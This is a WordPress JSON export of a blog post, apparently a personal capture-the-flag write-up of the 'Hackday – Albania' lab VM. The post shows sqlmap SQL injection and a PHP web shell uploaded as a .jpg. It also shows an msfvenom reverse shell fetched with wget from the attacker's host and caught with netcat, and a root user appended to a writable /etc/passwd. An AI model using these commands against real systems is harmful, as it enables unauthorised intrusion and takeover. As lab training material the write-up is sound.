{"id":154,"date":"2025-05-06T07:14:20","date_gmt":"2025-05-06T07:14:20","guid":{"rendered":"https:\/\/hackingwithj.com\/?p=154"},"modified":"2025-05-06T07:14:20","modified_gmt":"2025-05-06T07:14:20","slug":"vm-hackday-albania","status":"publish","type":"post","link":"https:\/\/hackingwithj.com\/?p=154","title":{"rendered":"VM: Hackday – Albania"},"content":{"rendered":"\n

As part of my pentesting journey, I\u2019ve been tackling more CTFs to build real-world experience. This time, I dove into Hackingday \u2013 Albania<\/em>, a VM filled with classic misconfigurations, red herrings, and just enough frustration to keep things interesting. While I didn\u2019t get full root (yet), I still came out better than I went in \u2014 and that\u2019s a win.<\/p>\n\n\n\n

\ud83d\udd0d Reconnaissance<\/h2>\n\n\n\n

As always, I kicked off with a basic nmap<\/code> scan to see what ports were open:<\/p>\n\n\n\n

$ nmap -sS -A T4 10.0.2.8<\/code><\/pre>\n\n\n\n
The scan revealed open SSH<\/strong> and HTTP<\/strong> ports. Visiting the website showed an image of Mr. Robot with what appeared to be Albanian text. After translating, it said: \u201cIf it\u2019s ME, I know where to go :)\u201d<\/em> Cryptic, but not actionable. Next, I checked out robots.txt<\/code>. Some disallowed entries returned an image with another translated message: \u201cIs this the wrong direction or am I wasting my time in vain?\u201d<\/em> So far, nothing concrete\u2014time to brute-force.<\/p>\n\n\n\n
I launched DirBuster<\/strong> with the medium wordlist. This uncovered three interesting paths:<\/p>\n\n\n\n
    \n
  • \/js\/<\/code> \u2013 showed the site\u2019s image<\/li>\n\n\n\n
  • \/js\/images\/<\/code> \u2013 standard directory with icons<\/li>\n\n\n\n
  • \/js\/external\/<\/code> \u2013 contained jQuery, nothing too useful<\/li>\n<\/ul>\n\n\n\n
    Feeling stuck, I went back to robots.txt<\/code> and decided to analyze the disallowed endpoints more systematically. Using wfuzz<\/code>, I checked for any with unusual response lengths:<\/p>\n\n\n\n
    $ wfuzz --script=robots -z list,robots.txt http:\/\/10.0.2.8:8008\/FUZZ<\/code><\/pre>\n\n\n\n
    One stood out, returning fewer characters. The message was: “Is there any \/vulnbank\/ in here?”<\/em> Accessing \/unisxcudkqjydw\/vulnbank\/<\/code> brought me to a login page.<\/p>\n\n\n\n
    \ud83d\udca5 Exploitation<\/h2>\n\n\n\n
    Time to poke at it. I threw sqlmap<\/strong> at the login:<\/p>\n\n\n\n
    $ sqlmap -u 10.0.2.8:8008\/unisxcudkqjydw\/vulnbank\/client.php\/login.php --data \"username=*&password=admin\"<\/code><\/pre>\n\n\n\n
    sqlmap<\/code> came through: the payload<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    worked, indicating SQL injection. I was in. The app had a file upload function\u2014perfect for testing a simple LFI:<\/p>\n\n\n\n
    <?php\nsystem($_GET['cmd']);\n?><\/code><\/pre>\n\n\n\n
    The upload only allowed image files, but renaming the .php<\/code> to .jpg<\/code> bypassed the filter. Success. Once uploaded, I confirmed the payload worked by running:<\/p>\n\n\n\n
    \/view_file.php?filename=shell.jpg&cmd=ls%20-al<\/code><\/pre>\n\n\n\n
    That gave me the contents of the working directory. A few files stood out\u2014most notably config.php<\/code>, which contained DB credentials, but ultimately wasn\u2019t useful.<\/p>\n\n\n\n
    http://192.168.1.84:8008\/unisxcudkqjydw\/vulnbank\/client\/view_file.php?filename=shell.jpg&cmd=ls%20-al\ntotal 52\ndrwxrwxr-x 4 taviso taviso 4096 Oct 20 12:28 .\ndrwxrwxr-x 3 taviso taviso 4096 Oct 20 12:31 ..\n-rwxr-xr-x 1 taviso taviso   87 Oct 19 08:31 client.php\n-rwxr-xr-x 1 taviso taviso 4137 Oct 20 12:27 config.php\ndrwxr-xr-x 2 taviso taviso 4096 Oct 19 08:15 images\n-rwxr-xr-x 1 taviso taviso  403 May 23  2016 index.php\n-rwxr-xr-x 1 taviso taviso  348 Oct 20 11:58 login.php\n-rwxr-xr-x 1 taviso taviso   81 May 22  2016 logout.php\n-rwxr-xr-x 1 taviso taviso 1198 Oct 20 12:28 ticket.php\ndrwxrwxrwx 2 taviso taviso 4096 Nov 28 01:17 upload\n-rwxr-xr-x 1 taviso taviso  532 Oct 19 08:29 view_file.php\n-rwxr-xr-x 1 taviso taviso 1029 Oct 19 08:29 view_ticket.php<\/code><\/pre>\n\n\n\n
    To speed things up, I dropped a reverse shell:<\/p>\n\n\n\n
    # On Kali\nmsfvenom -p php\/reverse_php LHOST=10.0.2.5 LPORT=4444 > reverse_shell.php\npython -m http.server\nnc -nlvp 4444\n\n# In browser\n\/view_file.php?filename=shell.jpg&cmd=wget%20-Pupload%2010.0.2.5:8000\/reverse_shell.php<\/code><\/pre>\n\n\n\n
    Shell gained<\/p>\n\n\n\n
    \ud83d\udd13 Privilege Escalation\u2026 (Almost)<\/h2>\n\n\n\n
    I began by checking for SUID binaries<\/strong>\u2014nothing promising. Then I scanned for writable files<\/strong> and noticed \/etc\/passwd<\/code> was writable. <\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    I added a root user manually:<\/p>\n\n\n\n
    echo \"batman:$hash:0:0:root:\/root:\/bin\/bash\" >> \/etc\/passwd<\/code><\/pre>\n\n\n\n
    It worked\u2014I could see the user was added. However, getting it to work with ssh<\/code> turned into a major headache. I tried everything: different shells, tweaking user creation, and even replicating writeups from others. Still, I was locked out with permission errors.<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    Eventually, after breaking my reverse shell with a typo and failing to regain stable access, I decided to stop and regroup<\/p>\n\n\n\n
    \ud83e\udde0 Lessons Learned<\/h2>\n\n\n\n
    \u2705 It\u2019s not always about root.<\/strong> Even without full escalation, I learned a lot. I got sharper with wfuzz<\/strong>, crafted better payloads, and got hands-on with SQLi<\/strong> and LFI<\/strong> exploitation.<\/p>\n\n\n\n
    \u2705 Writable \/etc\/passwd<\/code> isn\u2019t always a free win.<\/strong> Adding a user is easy. Logging in as that user? Not always. Shell type, PAM, and even shadow file setups can break it.<\/p>\n\n\n\n
    \u2705 Reverse shells are fragile.<\/strong> One typo killed my session. Lesson? Always have backup methods or cron persistence ready in future runs.<\/p>\n\n\n\n
    \u2705 Don\u2019t force it.<\/strong> I hit a wall and decided to walk away. Sometimes, you\u2019re better off stepping back and returning with fresh eyes.<\/p>\n\n\n\n
    I\u2019ll definitely revisit Hackingday \u2013 Albania<\/em> to try again. The fact that I didn\u2019t root it this time is a small bummer \u2014 but I found vulnerabilities, got a shell, and kept building my skills. And hey, that\u2019s what the grind is all about.<\/p>\n\n\n\n
    <\/p>\n","protected":false},"excerpt":{"rendered":"
    As part of my pentesting journey, I\u2019ve been tackling more CTFs to build real-world experience. This time, I dove into Hackingday \u2013 Albania, a VM filled with classic misconfigurations, red herrings, and just enough frustration to keep things interesting. While I didn\u2019t get full root (yet), I still came out better than I went in […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[8],"tags":[19,18],"class_list":["post-154","post","type-post","status-publish","format-standard","hentry","category-ctf","tag-lfi","tag-sqlmap"],"_links":{"self":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/154","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=154"}],"version-history":[{"count":13,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/154\/revisions"}],"predecessor-version":[{"id":175,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/154\/revisions\/175"}],"wp:attachment":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=154"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=154"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=154"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}